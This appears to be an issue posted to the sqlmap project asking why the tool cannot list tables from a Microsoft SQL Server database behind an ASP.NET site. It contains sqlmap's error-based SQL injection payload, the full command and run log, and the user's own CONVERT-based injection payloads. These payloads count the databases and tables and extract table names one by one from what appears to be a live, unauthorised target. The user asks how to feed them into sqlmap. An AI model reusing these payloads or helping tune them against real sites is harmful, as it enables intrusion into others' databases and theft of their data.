500 Internal Server Error / Subquery returned more than 1 value #5279
Description
Running environment:
- sqlmap version [1.6.12.1#dev]
- Installation method [e.g. git]
- Operating system: [Microsoft Windows 10]
- Python version [2.7]
Target details:
- DBMS : Microsoft SQL Server
- SQLi techniques found by Sqlmap:
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: Id=30053 AND 3172 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3172=3172) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)))
I 've a problem with SQLMap when i try to exploit data from a website has 2 Boolean and error base Sql injection
SQLMap successfully got the databases names but failed to get the tables names.
sqlmap.py -r "HFiles\HF5998_6153.txt" --level=5 --risk=3 -p "Id" --no-cast --batch -D "{{database_name}}" --tables --ignore-code=500
.....
....
...
[14:51:23] [INFO] testing Microsoft SQL Server
[14:51:23] [INFO] confirming Microsoft SQL Server
[14:51:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2016
[14:51:23] [INFO] fetching tables for database: {{database_name}}
[14:51:23] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[14:51:24] [WARNING] reflective value(s) found and filtering out
[14:51:24] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[14:51:25] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[14:51:26] [CRITICAL] unable to retrieve the tables for any database
[14:51:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[*] ending @ 14:51:26 /2023-01-02/
i thought it's WAF issue at first because it keep getting 500 ERRORS
even that i asked SQLmap to ignore it but nothing changed.
after this i tried to forward sqlmap requests through burp suite proxy and check the requests and responses
i got the following screen shot:
SQLmap request: Id=3962412 AND 3960 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT SUBSTRING((name),1,1024) FROM MSP..sysobjects WHERE xtype=CHAR(85))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(112)+CHAR(113)))
https://i.snipboard.io/f97Nxu.jpg
as you see the response has 500 error but still gives you data
and sqlmap request returned more than one value and it's not supported as showing.
and now my manual try:
Get Databases count
Id=30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases])+CHAR(120)+CHAR(120)))
https://i.snipboard.io/NeIUxh.jpg
Get Tables count
Id=30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [{{database_name}}]..[sysobjects] WHERE xtype = 'U')+CHAR(120)+CHAR(120)))
https://i.snipboard.io/ucsbOl.jpg
Get Database Tables one by one {{N}}
30076 AND 1=CONVERT(INT,(CHAR(120)+CHAR(120)+(SELECT DISTINCT top 1 [name] FROM (SELECT DISTINCT top {{N}} [name] FROM [{{database_name}}]..[sysobjects] WHERE xtype = 'U' ORDER BY [name] ASC) sq ORDER BY [name] DESC)+CHAR(120)+CHAR(120)))
https://i.snipboard.io/8Ly4Md.jpg
and by the way i tried all available tampers nothing works
and is there is a way i can use this queries in sqlmap ?